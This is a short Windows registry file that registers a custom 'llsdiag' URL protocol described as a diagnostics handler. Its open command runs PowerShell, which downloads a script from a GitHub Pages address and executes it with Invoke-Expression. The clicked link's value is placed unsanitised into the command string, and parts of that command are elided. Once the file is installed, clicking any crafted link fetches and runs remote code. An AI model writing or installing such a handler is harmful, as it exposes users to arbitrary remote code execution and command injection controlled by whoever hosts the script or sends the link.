
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\llsdiag]
@="URL:LLS Diag Protocol"
"URL Protocol"=""

[HKEY_CURRENT_USER\Software\Classes\llsdiag\shell]

[HKEY_CURRENT_USER\Software\Classes\llsdiag\shell\open]

[HKEY_CURRENT_USER\Software\Classes\llsdiag\shell\open\command]
@="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ... -Command \"$u = '%1'; ... $src = Invoke-WebRequest -UseBasicParsing 'https://jroman.github.io/net-ping-test/Runner.ps1'; Invoke-Expression $src.Content; ..."

